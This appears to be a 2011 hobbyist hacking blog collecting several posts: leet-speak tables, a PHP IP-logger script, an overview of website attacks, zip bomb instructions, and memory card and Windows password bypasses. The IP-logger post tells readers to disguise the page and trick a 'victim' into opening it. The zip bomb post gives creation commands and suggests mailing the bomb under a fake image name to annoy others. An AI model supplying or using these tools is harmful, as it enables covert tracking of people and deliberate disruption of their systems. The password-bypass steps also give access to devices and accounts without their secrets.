Sunday, 7 August 2011

Hackers language

Language, in short it's a mean to communicate with each other, people generally talk with each other by using sentences, phrases, etc, etc, there are many different languages which can be found spoken all over and around the world. Basically, every different country has its own language, so its not possible for others to communicate with them and also it's very hard for a person to learn  every those such languages. For this people had made a common language, which can be used to communicate with each and everyone, i.e., English.


Hackers have also found there own language, which they basically use to communicate with each other. The Hacker's language used by the hackers to communicate with each other hackers is 'leet'. For example , leet spelling of the word leet include 1337 and l33t. It was originally created by a groups of chatters/gamers in early 1980s, it was developed to frustrate text filters created by BBS or Internet Chat System Operators.

Its a cryptic writing language used to shorten the messages or rather as a form of encryption to hide the actual meaning. The main purpose of this was to prevent others from discouraging them from the discussion of some proscribed topics like hacking, cracking, many more.

Some examples of leet speaking:

  • n00b for noob/newbie
  • d00d for dude
  • m0n3y for money
  • H3LLo for hello
  • W3lc0m3 for Welcome
  • h4x0r for hacker

You can use this for creating your own



  • A = 4, /-\, @, ^, /\ , //-\\, ci
  • B = 8, ]3, ]8, |3, |8, ]]3, 13
  • C = (, { , [[, <, €
  • D = ), [}, |), |}, |>, [>, ]]), Ð
  • E = 3, ii, €
  • F = |=,(=, ]]=, ph
  • G = 6, 9, (_>, [[6, &
  • H = #, |-|, (-), )-(, }{, }-{, {-}, /-/, \-\, |~|, []-[], ]]-[[
  • I = 1, !, |, ][, []
  • J = _|, u|, ;_[], ;_[[
  • K = |<, |{, ][<, ]]<, []<
  • L = |,1, |_, []_, ][_, £
  • M = /\/\, |\/|, [\/], (\/), /V\, []V[], \\\, (T), ^^, .\\, //., ][\\//][,
  • N = /\/, |\|, (\), /|/, [\], {\}, ][\][, []\[], ~
  • O = 0, (), [], <>, *, [[]]
  • P = |D, |*, |>, []D, ][D
  • Q = commas are necessary: (,) or 0, or O, or O\ or []\
  • R = |2, |?, |-, ]]2 []2 ][2
  • S = 5, $
  • T = 7, +, ']‘, 7`, ~|~, -|-, ‘][', "|", †
  • U = (_), |_|, \_\, /_/, \_/, []_[], ]_[, µ
  • V = \/ , \\//
  • W = \/\/, |/\|, [/\], (/\), VV, ///, \^/, \\/\//, 1/\/, \/1/, 1/1/
  • X = ><, }{, )(, }[
  • Y = ‘/, %, `/, \j , “//, ¥, j, \|/, -/
  • Z = 2, z, 7_,`/_

LOG VICTIM's IP

I know you most of the time search on GoogleYahoo, etc, for tutorial on tracking your victim's IP. Yes, you can find many positive response, and there are also many ways by which you can log IP, but all those methods are a little bit tough as compared to my one, I have found a fresh technique by which you can log your victim's IP easily. This method is far most the best way of logging IP which I used myself many times.


What we will need?
This method doesn't require any heavy program or any other means. It will require:

  • A Free and powerful hosting. I will recommend to use My3gb, or else your wish.
  • A Php script to log IP which I have provided below.
  • Some brain and a little bit HTML knowledge
How to Setup your IP logger?
After fulfilling all the required things, we will have to setup our IP logger so that it can log IPs. Create your account at any free hosting site, I use My3gb by myself, or you can also use any other hosting as per your choice. Open notepad and paste this script: 

<html>
<?php
$file = "log.txt";
$f=fopen($file, 'a');
fwrite($f,$_SERVER['REMOTE_ADDR']."\n\n"); 
fclose($f);
?>
//You can customize this part to make your page look attractive
</body>
</html>
Save this as Logger.php. Then you will have to create a text file with name log.txt.
After creating both these files, upload it to your website.

How to log IPs?
After uploading these files you will get a link, copy the link of your "Logger.php" file and send it to your victim by any means, but before doing this, test it for minimum two times on yourself. Now you can get the IP of your victim as soon as he open that link and the IPs will be logged in your "log.txt".

Customize the Logger.php file
This is very important step because as soon as your victim's visit your IP logging page then if he will find nothing or some suspicious thing then he will came to know that there is something wrong. For securing yourself from this suspicion you will have to customize your file, its easy if you have a little bit knowledge of HTML. Using HTML, you can simply made a small beautiful page for your victim. You can learn HTML fromw3schools

Now you will need some brains as I told above to send that Logger.php link to your victim, this can only be done by you, I cannot help you in this much, you can use Social Engineering or any other method like that.

TEChniques for hacking websites

Everyday, you search in GoogleYahoo, and other search engines, "How to Hack Websites?", "Methods to Hack Website", "Website Hacking", etc. Website Hacking have become a popular business or rather an interesting game for many people, reasons behind this hack is normally to prove their skills and to get fame, or anything else. As we know, "To catch a thief, we must think like a thief", like here also, we can conclude that to secure a things, we must first find insecure in it, then we can proceed on securing. So, before proceeding to the topic of securing we must first know what is insecure in it.


There are many drawbacks by which websites are compromised, these is normally due to the poor management of site by the webmaster or admin.

So, the methods by which websites are hacked are:
  • Cross-Site Scripting
  • SQL Injection
  • Remote File Inclusion
  • Local File Inclusion
  • Denial of Service Attack
  • Brute-Force Attack
These are some of the common methods to hack a website, let's discuss them below.
  • Cross-Site Scripting: Cross-Site Scripting is a type of attack in which a hacker inject script into webpages. Their effect may range from a pretty nuisance to a significant security risk. By this way of injecting codes into webpages, a hacker can gain access to sensitive page content, session cookies, and a variety of other information which are maintained by the browser on behalf of the user. 
  • SQL Injection: SQL stands for Structured Query Language, SQL Injection is a another type of web application vulnerability occurring in the database layer of an application. It is mostly used for stealing sensitive data (like Username, Password, Email ID, many more). It takes advantages of improper coding in the web application that allow the attacker to inject SQL commands.
  • Remote File Inclusion: Remote File Inclusion (RFI) allows an attacker to include a remote file, usually through a script on the web server. A hacker usually upload a file (normally a shell) by tricking the web server on the webpage. 
  • Local File Inclusion: A Local File Inclusion (LFI) is a method to include local files on runtime. This is much same like RFI. This method involves the discovering of /etc/passwd/ file in the web directory.
  • Denial of Service Attack: Denial of Service Attack (DoS attack) or Distributed Denial of Service attack(DDoS attack) is an attempt to make the computer resource unavailable to its users. These are the common attack nowadays, its main purpose is to obstruct the communication of the victim's computer by forcing the targeted computer(s) to reset.
  • Brute-Force Attack: Brute-Force Attack is a method in which an attacker tries to crack every possible letters of the password until the whole password is cracked. The main drawback of this attack is that it takes too much time while cracking the password, as it tries every possible character which can be a part of the password.
There are many other ways too for taking over a site, but these are nowadays very common. 

Take a look at the above image, it clearly shows different types of web attacks

Some others methods are DNS Hijacking, Insufficient Administration, Misconfiguration, Uses of Trojans, many more.

My advice to all the webmaster or admin is to check their site against these vulnerabilities as to protect them from future attacks.

ZIP bomb

A zip bomb, also known as a Zip of Death, is a malicious archive file designed to crash or render useless the program or system reading it. It is often used by virus writersto disable antivirus software, so that a more traditional virus sent afterwards could get into system undetected. A zip bomb is usually a small file (up to a few hundred kilobytes) for ease of transport and to avoid suspicion. However, when the file is unpacked its contents are more than the system can handle.You can make your own zip bomb to annoy your friends or just out of curiosity (or wilderness) to experiment with it. Make sure you don't detonate it on yourself.



Here is how to make your own Zip of Death -

Create a new text file,name it a.txt



Open and type the null character (alt + 255) in it.
Now press Ctrl + A then Ctrl + V a couple times to make some null bytes.If u have a hex editor,then make the hex 00 for about 50 kilobytes.
Now make several copies of a.txt in the same directory and name them accordingly.


Open Command prompt and navigate to the folder containing a.txt . Type -
copy /b *.txt b.txt


This will write all the contents of a.text and its copies into a new text file called b.txt,hence making every copy is a super copy. Repeat the above steps from the beginning again and again to make a really big text file.
Once u have a nice empty big text file like 1gb or more,then compress it using Winrar or Winzip into a zip file.
You will find that it will be compressed to very small size (about 1MB ). It is because of the simple construction of the file as the text file contains 1gb of null bytes.
For added fun,open the compressed zip file file into a hex editor. You will see a bunch of hex 5555.Just add some more and the file will expand amazingly.


Make sure that YOU DONT OPEN THIS afterwards.
You can make the same file in Linux by typing -
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz
Send it to your friends (or foes) and it will definitely annoy them . Use some creativity and rename the text file into some thing like Angelina Jolie.jpg and compress it and email to your friends. Once they download it,they will never be able to download again (sarcasm..sarcasm).More disastrous combinations can be made by experimenting with it.I mean..you get the idea :)
Also,you can check out the one of the most famous zip bombs alive today – 42.zip (only 42 KB) which will uncompress to about 4 Petabytes (1 Peta byte = 1024 TB and 1 TB = 1024 GB ) of file size. Dangerous huh..?

How to find the “real” IP address of a web site?


You can use the PING utility included with Windows to determine the “real” IP address of a web site. Before using this utility, make sure you are not mapping a host name to some IP address with HostName Commander, because if you do, the PING utility will show the address you’ve set up with HostName Commander, instead of the “real” IP address.
To run the PING utility, click on the Windows Start button, and choose Run from the Start Menu. If you use Windows 95,98, or Me, enter “command” (without the quotes) as the command line to run. If you use Windows XP,2000, or NT, enter “cmd” (again, without the quotes). Click OK and the command prompt window should appear on the screen.


Now enter the word “ping” (without the quotes) followed by a space, followed by the host name you want to determine the IP address of, and press Enter:
 In this example, the IP address of the host name www.rkgit.edu.in is 74.52.201.2 & IP Address of the host name www.kiet.edu is 220.225.19.55 . (Keep in mind that the IP address may change in the future!). If the PING utility reports an error, make sure your computer is connected to the Internet when you are running it.

Reset Your Mobile Memory Card Password


We usually set password for our memory card for privacy and security, but the common mistake every one does at least once in out life time forgetting password. If you set password for mobile memory card, then you should be not forget the password. If you does then the only option is to formate your memory card with the help of the card reader and eventually the loss of all your data stored on it. There is a way to break the security wall. If you are a Symbian device lover then no need to worry about the password. You can crack them in few minutes.





In this tutorial I am going to teach you how to reset your memory card password in easy step. Before we start you need to have X-plore (application used to explore your system files and folder even the hidden folders in your device)



Step1: Install X-Plore in your mobile. If you want to download X-Plore search around internet you can download free trail.

Step2: Open your X-plore apps and Press 0(Zero) and check which you have marked the "show the system files"

Step3: Once you done that now go to the following path C:/Sys/Data/Mmcstore

Step4: Once you reached there you need to press "3" under option to set it in the Hex-viewer

Step5: See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6). Just check the character between the "?" it is your password ie: 62626



Note: If you have not set the password, then you will not able to gain access to C:/Sys/Data

Wednesday, 3 August 2011

HACK admin password


Most of us might have experienced a situation when we forget our Windows administrator password.And we are not able to login into windows and access our all necessary data and programs.At that time the only solution that comes into or mind is the installation of fresh copy of windows but this will lead to loss of all data and files that are in the windows drive.There is also another way around using which you don’t need to install a fresh copy of windows and without losing any data.We are providing here the method to reset windows administrator password.This tutorial is only for the purpose of recovering your windows 7,xp or vista password.This should be used only when you forgot or lost your password  and not for hacking into somebody else’s system.Using this hack  you can reset your administrator password or leave it blank.
By using this tutorial
1.You donot need to know anything about your old password.
2.You can unlock locked or disabled accounts.
3.Also edit the registry.
The requirements for using this method are:-
1.Blank CD/floppy disk.
2.Access to Internet.
3.Cd or floppy writer
These requirements can be easily fulfilled by spending 15 minutes in cybercafe or at friends computer
Now here is the step by step tutorial with screenshots on how to hack administrator password in windows 7,vista or xp.
1.Download this small utility.
2.You will get an zipped file with ISO image in it.Extract his image using winrar or inbuilt windows software.
3.Put your blank cd in CD-ROM and burn this using Nero or any other image burner software.this is most important step and make sure you burn the ISO image properly.
4.Now put this CD in the system whose password is to be reset.
5.Restart your system and when prompted press enter to boot from the CD.
offlinentpassword05upd Hack Administrator Password In Windows 7,Xp And Vista
Note:If you do not get prompt of boot from CD.Then restart you system and press f2 or f6 or f8 or Esc key(anyone of them should work for your system) before the booting of the windows start.Now you will enter into bios and you should change the boot order from here with the first preference as CD-ROM.And again restart your system
6.Now the software will load automatically.It will ask you to select the windows drive and after that provide you with the option of resetting password.
If you have any queries or suggestion do not hesitate to ask.,